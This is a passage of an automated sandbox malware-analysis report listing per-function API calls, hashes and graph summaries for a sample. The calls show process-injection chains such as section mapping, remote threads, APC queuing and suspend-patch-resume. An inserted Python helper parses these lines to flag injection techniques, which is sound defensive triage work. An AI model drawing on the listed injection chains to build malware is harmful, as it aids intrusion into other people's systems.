                          • lstrcpy.KERNEL32(00000000,05FB8560), ref: 05B68DF3
                          • lstrcat.KERNEL32(00000000,?), ref: 05B68DFE
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                          • String ID:
                          • API String ID: 74227042-0
                          • Opcode ID: 2f31ba3320bbdd3ffc1ce6f01697236ae823860a3c0a525393c65997240f9619
                          • Instruction ID: 61969d10790d996406f3512c07fb1e21cc1bc7773bb7cda3115b730413900d31
                          • Opcode Fuzzy Hash: 2f31ba3320bbdd3ffc1ce6f01697236ae823860a3c0a525393c65997240f9619
                          • Instruction Fuzzy Hash: 5DE09233501220AB87219BE4AC4CCAFBFADEF996203040816F600D3100CB25A800CBE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(05299B68,00000000,00000000,00000000,01005902,00000000), ref: 0100394C
                          • lstrlen.KERNEL32(?), ref: 01003954
                            • Part of subcall function 01006D63: RtlAllocateHeap.NTDLL(00000000,00000000,01005D7B), ref: 01006D6F
                          • lstrcpy.KERNEL32(00000000,05299B68), ref: 01003968
                          • lstrcat.KERNEL32(00000000,?), ref: 01003973
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
• Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                          • String ID:
                          • API String ID: 74227042-0
                          • Opcode ID: 60abbeb27a5d93f86e2ef613325ce10db2493c8fd156d58c354b0857885724a3
                          • Instruction ID: 232959e164427f50954d7e25f00792eec380beee3b3cb3c0976b857c811dc687
                          • Opcode Fuzzy Hash: 60abbeb27a5d93f86e2ef613325ce10db2493c8fd156d58c354b0857885724a3
                          • Instruction Fuzzy Hash: 7AE09273905621AB8723ABE8AC48C9FBBADEF89661F044416F644D3115C76A98018BE1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000018.00000003.395255840.00000293CD960000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000293CD960000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_3_293cd960000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                          • Instruction ID: c91bda8d321a9a821cd8d4c48e8f2e458cd323f73694db503ac949b9b248c66e
                          • Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
                          • Instruction Fuzzy Hash: DEB0120846FFC24ED70313730CA925D2F60AE47114FC919C79059D50D3E04C068E5322
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000018.00000003.395255840.00000293CD960000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000293CD960000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_3_293cd960000_mshta.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                          • Instruction ID: 27aecde98b4e6d41c16ef3b5bb8676dca2f3a5ffa2eaa5aebd85813c69b063d7
                          • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                          • Instruction Fuzzy Hash: 4B90024859580655D55451A10C8925C50416788150FD44481542AA0184D48D03971252
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID:
                          • String ID: @
                          • API String ID: 0-2766056989
                          • Opcode ID: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                          • Instruction ID: a1eaa72b6bdb84c070646fec1a97f5c8bf849ca1c759cafac44ae41e445d6831
                          • Opcode Fuzzy Hash: 3eca525cd128f1419d277dafea458dc829a131b9efbb4a20cf129a08f58ee42c
                          • Instruction Fuzzy Hash: F3127330618E4D8FDB69EF28D895A7673E1FB98301F50452EE64AC3251EF38E945CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7f65e4, basic blocks 7f65e4-7f6735. API calls in graph: NtQueryInformationToken (blocks 7f667a-7f66bb and 7f66bd-7f66e8), NtClose (7f6710-7f6718). Internal calls: 7fe53c, 7fb7b8.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: InformationQueryToken$Close
                          • String ID: 0
                          • API String ID: 459398573-4108050209
                          • Opcode ID: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                          • Instruction ID: 12a1b93eae9d5889d9042574a5aa5d1b128001821425078424c2de6f7e1ce914
                          • Opcode Fuzzy Hash: 1d329fb9e0d882055965528541753bd1d632a96cf17403ec62c6e1096f290a42
                          • Instruction Fuzzy Hash: 0E311E312187488FD764EF19D8C87AAB7E5FBD9311F50492EE58EC3250DB349945CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7faa6c, basic blocks 7faa6c-7fac54. API calls in graph: NtSetInformationProcess (block 7faaec-7fab1c), CreateRemoteThread (7fab94-7fabc4), ResumeThread (7fac01), FindCloseChangeNotification (7fac07-7fac12). Internal calls: 7f495c, 816e10, 8171e8, 7feca8.
                          APIs
                          • NtSetInformationProcess.NTDLL ref: 007FAB14
                          • CreateRemoteThread.KERNELBASE ref: 007FABBA
                          • FindCloseChangeNotification.KERNELBASE ref: 007FAC0C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ChangeCloseCreateFindInformationNotificationProcessRemoteThread
                          • String ID:
                          • API String ID: 1964589409-0
                          • Opcode ID: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                          • Instruction ID: 1ee13dd08e825e05a0925573d1c95303e9a198dabefdd0a3aa132fcb0b1eeb5a
                          • Opcode Fuzzy Hash: dd0c2b130d36feadd4af54306e709c2e104e3e661f7d0464bc00cc3c0d7906f7
                          • Instruction Fuzzy Hash: 0351AF71618F098FE764EF28D89967677E1FB98311F10452DEA4AC3361EA38DC41C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7feef8, basic blocks 7feef8-7ffb3e. API calls in graph: CreateMutexExA (block 7fefb9-7fefe2), GetUserNameA (7ff1f4-7ff20f). Internal calls: 7fe53c, 803bc8, 81b2cc, 7fb7b8, 7fccc8, 80b4b0, 819604, 81ba3c, 8198a8, 80ef6c, 80d43c, 80ac88, 81b4d0, 8126bc, 817004, 818678, 816b44, 810c58, 8148d4, 80f5d8, 80b24c, 7ffe20, 7f6274.
                          APIs
                          • CreateMutexExA.KERNEL32 ref: 007FEFC5
                          • GetUserNameA.ADVAPI32 ref: 007FF1FE
                            • Part of subcall function 008126BC: CreateThread.KERNELBASE ref: 008126EC
                            • Part of subcall function 008126BC: QueueUserAPC.KERNELBASE ref: 00812703
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateUser$MutexNameQueueThread
                          • String ID:
                          • API String ID: 2503873790-0
                          • Opcode ID: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                          • Instruction ID: 20fc3d343d1da8205a177cbc89913b3cf2f653d474580bdf71e2141fea2ddfd6
                          • Opcode Fuzzy Hash: 65416d51ddc368e46638aa6b834957fa1499cd6a752d9d41a9b0e699f5c12d94
                          • Instruction Fuzzy Hash: 2A729275619A0C8FE778EF28EC8556973E5FB58700B20852ED54BC3261DE38E947CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 80583c, basic blocks 80583c-805a77. API calls in graph: NtCreateSection (block 805961-8059e3). Internal calls: 7fe53c, 8041d8.
                          APIs
                          • NtCreateSection.NTDLL ref: 008059DE
                            • Part of subcall function 008041D8: NtMapViewOfSection.NTDLL ref: 00804224
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: Section$CreateView
                          • String ID: 0
                          • API String ID: 1585966358-4108050209
                          • Opcode ID: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                          • Instruction ID: 01b22afbdf01197ed4346743cf7bd75f09731b8f6da1a5dd4d2f950640af79fd
                          • Opcode Fuzzy Hash: ddee7626615230fcf7c395749575c7ba4c8475b06737a6c62266c65c6789a215
                          • Instruction Fuzzy Hash: CF61B070218F098FDB54EF28D8C9A6677E1FB98305F10466EE84AC7261EB34D941CF92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 8104cc, basic blocks 8104cc-81052e. API calls in graph: NtAllocateVirtualMemory (block 8104e2-81050d). No internal calls.
                          APIs
                          • NtAllocateVirtualMemory.NTDLL ref: 00810509
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: AllocateMemoryVirtual
                          • String ID: @
                          • API String ID: 2167126740-2766056989
                          • Opcode ID: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                          • Instruction ID: 7d02e0e189f80185fc29b250cd56b1631ea88fd10ba0a9f0bc032ff7f5a4bdfc
                          • Opcode Fuzzy Hash: 4a635f0baf7352d585f4b9955f8ef4a3d1a48b6d8d42aa917975d814b7700276
                          • Instruction Fuzzy Hash: 0EF09070614A088BDB449FA8D8CC6BA76E1FF5C305F40096DE10ADB254DBB8C9848B46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 82f002, basic blocks 82f002-82f36a. API calls in graph: NtProtectVirtualMemory (blocks 82f237-82f282 and 82f2d0-82f316). No internal calls.
                          APIs
                          • NtProtectVirtualMemory.NTDLL ref: 0082F27A
                          • NtProtectVirtualMemory.NTDLL ref: 0082F309
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078960636.000000000082F000.00000040.80000000.00040000.00000000.sdmp, Offset: 0082F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_82f000_control.jbxd
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 4578fbfbe2845bb9683d85fa29efcc9a2ae82d964b861cac278506f9b548278c
                          • Instruction ID: 420e81aed946faf48a5be3673e94056e3e8689418946f89aac21fa8914812b75
                          • Opcode Fuzzy Hash: 4578fbfbe2845bb9683d85fa29efcc9a2ae82d964b861cac278506f9b548278c
                          • Instruction Fuzzy Hash: 19A1F13120CB988FC725DF28E8856A9B7F1FB96300F58457ED58BC7253D634A886C782
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          • API String ID: 10892065-0
                          • Opcode ID: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                          • Instruction ID: 77127a37dd4469a27a4d80e89fb86e93a75058cea506b3716359d55b624a335a
                          • Opcode Fuzzy Hash: f2e9bff578f9a15bce2ef6bf4145e31af0cb62274452ec41cbe60190f951919a
                          • Instruction Fuzzy Hash: 9A818230718B0D8FE768EF28D89967A33E5FB98311F24452EE54AC3261EF78D8468741
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtQueryInformationProcess.NTDLL ref: 0081A16E
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: InformationProcessQuery
                          • String ID:
                          • API String ID: 1778838933-0
                          • Opcode ID: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                          • Instruction ID: 4ed664ebf2a449b08974d3a18016d3e2b0fe78343e59c997b4c2c55024f03759
                          • Opcode Fuzzy Hash: dfb0bd0d955acea561495a2b9a6a1e46d5472ef252c8a6bc1bd17e1be8bc3492
                          • Instruction Fuzzy Hash: 45018130319E4D9F9B88EF68D5C4B65B3E8FFA8305B40016EA40AC3124D774D8C1CB02
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: SectionView
                          • String ID:
                          • API String ID: 1323581903-0
                          • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                          • Instruction ID: f353d06753c5583719d8bcaaf728a806513d2dca57b1699c60ca5cc47c3fc633
                          • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                          • Instruction Fuzzy Hash: 400112B0A08B048FCB48EF68D0C8569BBE0FB58311B10066FE949CB796DB30D885CB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: MemoryReadVirtual
                          • String ID:
                          • API String ID: 2834387570-0
                          • Opcode ID: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                          • Instruction ID: c03ebca3bc83756757ea49345bc6346ef35b3886f1de9fbf93ea1b75cb4bed79
                          • Opcode Fuzzy Hash: ffe9d94baff124fbd0c0dae0ab1b7fff43dad1889fc04521d7e790575ae50dc4
                          • Instruction Fuzzy Hash: 7AE04F34715B888BEB00ABB88CCD63E73D5F799305F604879EA55C7361DA2EC8958742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • NtWriteVirtualMemory.NTDLL ref: 007F6D43
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: MemoryVirtualWrite
                          • String ID:
                          • API String ID: 3527976591-0
                          • Opcode ID: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                          • Instruction ID: a7c1f3a228d9be45fbde5f1712cb73a2fef4feaa49fc5c1e7995e1509dcfce8a
                          • Opcode Fuzzy Hash: d23d61faf8d6dfe27aa2c22a3f5bc1c750ef00163c72f4a258adb9736be49e33
                          • Instruction Fuzzy Hash: A1E04874715A484BDF14AFB488CD23973D1F748305F10043AE645C7364D62DC8855742
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7feca8, basic blocks 7feca8-7feef4. API calls in graph: VirtualProtectEx (blocks 7fed92-7fedb7 and 7fee6f-7fee9c), ResumeThread and SuspendThread (7fede8-7fee22). Internal calls: 7fe53c, 7f495c, 7f9660, 7fb11c, 7f40c0, 7f4a48.
                          APIs
                            • Part of subcall function 007F495C: FindCloseChangeNotification.KERNELBASE ref: 007F4A08
                          • VirtualProtectEx.KERNELBASE ref: 007FEDAF
                          • ResumeThread.KERNELBASE ref: 007FEDEC
                          • SuspendThread.KERNELBASE ref: 007FEE0F
                          • VirtualProtectEx.KERNELBASE ref: 007FEE8C
                            • Part of subcall function 007F4A48: VirtualProtectEx.KERNELBASE ref: 007F4A9C
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: ProtectVirtual$Thread$ChangeCloseFindNotificationResumeSuspend
                          • String ID:
                          • API String ID: 4107391026-0
                          • Opcode ID: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                          • Instruction ID: 60fc0926890578c0e9ea5a6b82bc50a7726d9d1dda2f9ca446a59ac3019f187d
                          • Opcode Fuzzy Hash: 402ce7ab850c0aaf866a792033b954b0627cae8d5c5966339e0a1a97b78aa575
                          • Instruction Fuzzy Hash: 9761803061CA4C8FD768EB28E8857BA73D5FB98315F10052DE68AC3261DF38D9468B46
                          Uniqueness

                          Uniqueness Score: -1.00%
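                          The functions listed above share the API call sites of several process-injection chains (NtCreateSection with NtMapViewOfSection in a subcall, CreateRemoteThread, CreateThread with QueueUserAPC in a subcall, and SuspendThread/VirtualProtectEx/ResumeThread around a remote patch). The following triage helper is an added example, not Joe Sandbox code and not part of this report: it parses "APIs" bullet lines in the format the report prints them, treats APIs reached through a "Part of subcall function" line as reachable from the calling function, and flags which chain each function matches. The "func <addr>" header lines in the embedded sample are a constructed framing (the report separates functions with other metadata instead), and the rule table is a heuristic assumption, not a Joe Sandbox signature.

```python
"""Triage helper for the per-function "APIs" lists in a Joe Sandbox report.

Added example (not Joe Sandbox code): groups API call sites by function and
flags the process-injection API chains seen in this report. The rule table is
a heuristic assumption, not a Joe Sandbox signature definition.
"""
import re
from dataclasses import dataclass

# Constructed sample: the API lines are copied from the report. The
# "func <addr>" header lines are an added framing convention, using the start
# address of each function's control-flow graph.
SAMPLE_REPORT = """\
func 007FAA6C
• NtSetInformationProcess.NTDLL ref: 007FAB14
• CreateRemoteThread.KERNELBASE ref: 007FABBA
• FindCloseChangeNotification.KERNELBASE ref: 007FAC0C
func 007FEEF8
• CreateMutexExA.KERNEL32 ref: 007FEFC5
• GetUserNameA.ADVAPI32 ref: 007FF1FE
  • Part of subcall function 008126BC: CreateThread.KERNELBASE ref: 008126EC
  • Part of subcall function 008126BC: QueueUserAPC.KERNELBASE ref: 00812703
func 0080583C
• NtCreateSection.NTDLL ref: 008059DE
  • Part of subcall function 008041D8: NtMapViewOfSection.NTDLL ref: 00804224
func 007FECA8
• VirtualProtectEx.KERNELBASE ref: 007FEDAF
• ResumeThread.KERNELBASE ref: 007FEDEC
• SuspendThread.KERNELBASE ref: 007FEE0F
• VirtualProtectEx.KERNELBASE ref: 007FEE8C
func 007F25C0
• CreateFileA.KERNELBASE ref: 007F2694
• SetFilePointer.KERNELBASE ref: 007F26AE
• ReadFile.KERNELBASE ref: 007F26D0
• FindCloseChangeNotification.KERNELBASE ref: 007F26EB
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    ref: str          # call-site address as printed in the report
    via_subcall: str  # start address of the subcall function, "" if direct


_FUNC_RE = re.compile(r"^func\s+([0-9A-Fa-f]{8})\s*$")
# Matches "• Api.MODULE ref: ADDR" and
# "• Part of subcall function ADDR: Api.MODULE(args...), ref: ADDR".
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
    r"([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9_]+)\b.*?ref:\s*([0-9A-Fa-f]{8})\s*$"
)

# Heuristic rule table (assumption): every API in a set must be reachable from
# the function, directly or through a subcall, for the technique to be flagged.
INJECTION_RULES = {
    "section-mapping injection": frozenset({"NtCreateSection", "NtMapViewOfSection"}),
    "remote thread creation": frozenset({"CreateRemoteThread"}),
    "APC injection": frozenset({"CreateThread", "QueueUserAPC"}),
    "suspend/patch/resume thread": frozenset(
        {"SuspendThread", "VirtualProtectEx", "ResumeThread"}
    ),
}


def parse_api_lines(text):
    """Return {function_start: [ApiCall, ...]} from report-style API lines."""
    calls = {}
    current = None
    for line in text.splitlines():
        m = _FUNC_RE.match(line)
        if m:
            current = m.group(1).upper()
            calls.setdefault(current, [])
            continue
        m = _CALL_RE.match(line)
        if m and current is not None:
            sub, api, module, ref = m.groups()
            calls[current].append(ApiCall(api, module, ref.upper(), (sub or "").upper()))
    return calls


def classify(calls_by_func, rules=INJECTION_RULES):
    """Return {function_start: [technique names whose API set is fully reachable]}."""
    result = {}
    for func, calls in calls_by_func.items():
        reachable = {c.api for c in calls}
        result[func] = [name for name, needed in rules.items() if needed <= reachable]
    return result


def triage(text, rules=INJECTION_RULES):
    return classify(parse_api_lines(text), rules)


if __name__ == "__main__":
    for func, techniques in triage(SAMPLE_REPORT).items():
        print(func, "->", ", ".join(techniques) or "no injection chain matched")
```

                          Subcall APIs are folded into the caller's reachable set on purpose: 0080583C only calls NtCreateSection itself, and the NtMapViewOfSection half of the chain sits in its callee 008041D8, so matching on direct calls alone would miss the section-mapping pattern.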

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7f25c0, basic blocks 7f25c0-7f271c. API calls in graph: CreateFileA (block 7f266e-7f26a1), SetFilePointer (7f26a3-7f26b6), ReadFile (7f26b8-7f26d8), FindCloseChangeNotification (7f26e8-7f26eb). Internal calls: 81c930, 81887c.
                          APIs
                          • CreateFileA.KERNELBASE ref: 007F2694
                          • SetFilePointer.KERNELBASE ref: 007F26AE
                          • ReadFile.KERNELBASE ref: 007F26D0
                          • FindCloseChangeNotification.KERNELBASE ref: 007F26EB
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                          • String ID:
                          • API String ID: 2405668454-0
                          • Opcode ID: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                          • Instruction ID: 75aa89038b6bf0b440d3bd92f51d062c1a216fef6ed6873c662f4f05e9ac741b
                          • Opcode Fuzzy Hash: 15c46c7971568a1e5738af9ca929169a9ceca98acae8aacbac5953522a212d00
                          • Instruction Fuzzy Hash: 3B41A730218A0C4FDB58DF28D8C463577E1FB98315B24466EE59AC3666DB39D8478B42
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 7f1930, basic blocks 7f1930-7f1b34. API calls in graph: lstrcmp (block 7f1a90-7f1a9f), RtlDeleteBoundaryDescriptor (7f1b05-7f1b17). No internal calls.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: BoundaryDeleteDescriptorlstrcmp
                          • String ID:
                          • API String ID: 735288309-3916222277
                          • Opcode ID: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                          • Instruction ID: 9845a8549d3875e3b1e869d05e0ff9e859102d290a2c7555a6f955540f473ed2
                          • Opcode Fuzzy Hash: e550695b4b61958b2117182ed079959755ec0d1867ab0c412c5e6705c87392a7
                          • Instruction Fuzzy Hash: 1551593161CA8C8BD72CAE1C9C8627973D5E789311FA4413EDADAC3351DA29AC5387C2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          Graph summary (node/edge rendering not preserved): function 80d43c, basic blocks 80d43c-80d5e4. API calls in graph: RegQueryValueExA (block 80d489-80d4ba). Internal calls: 817004, 81772c, 809684.
                          APIs
                            • Part of subcall function 00817004: RegCreateKeyA.ADVAPI32(?,?,?,00819153), ref: 00817027
                          • RegQueryValueExA.KERNELBASE ref: 0080D4B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: CreateQueryValue
                          • String ID: ($(
                          • API String ID: 2711935003-222463766
                          • Opcode ID: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                          • Instruction ID: 935dca7d8651dc1de8318c7ab6a707e6bd98a53a717e07a2f512f696085cb7f9
                          • Opcode Fuzzy Hash: 7039fa200ef29c184f5b10477ca8e5680abadd57b94e265f504d8aab6c8d6b78
                          • Instruction Fuzzy Hash: B641B6706187488FE744EF58EC986A673E5FB98309F00C52DD88AC32A0DF78DA45CB46
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          APIs
                          • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000001F), ref: 007FB803
                          • RtlAllocateHeap.NTDLL ref: 007FB825
                          • RegQueryValueExA.KERNELBASE ref: 007FB887
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: QueryValue$AllocateHeap
                          • String ID:
                          • API String ID: 2311914766-0
                          • Opcode ID: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                          • Instruction ID: 74a181415634453580c9a0acba77c83877f2c13bc25e233603fe93faa21e82d8
                          • Opcode Fuzzy Hash: ef6809351d6a3fd0382751fac07e276fa1a4ebb1ea0e019a2a018e57f3e20f07
                          • Instruction Fuzzy Hash: 0A31843161CB088FEB58EF18D489666B7E1FBA8311F11456EE949C3251DF74DC458B82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001E.00000002.1078876889.00000000007F1000.00000020.80000000.00040000.00000000.sdmp, Offset: 007F1000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_30_2_7f1000_control.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: H
                          • API String ID: 1029625771-2852464175
                          • Opcode ID: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                          • Instruction ID: 4de0599c6e34ed812fd9b06f6685030a755a453a2929b94e2857c8dafbd8915b
                          • Opcode Fuzzy Hash: 6cc38ccaa850b681befee8090efae8b1f89e5c4c5265d701e1b2086e5fd9da55
                          • Instruction Fuzzy Hash: 00A18130508F0A8FEB55DF58D8886A6B7E5FF98315F00462ED84AC7261EF34D981CB85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph
                          APIs
                            • Part of subcall function 00817340: VirtualProtect.KERNELBASE ref: 00817373
                          • VirtualProtect.KERNELBASE ref: 007F1C59
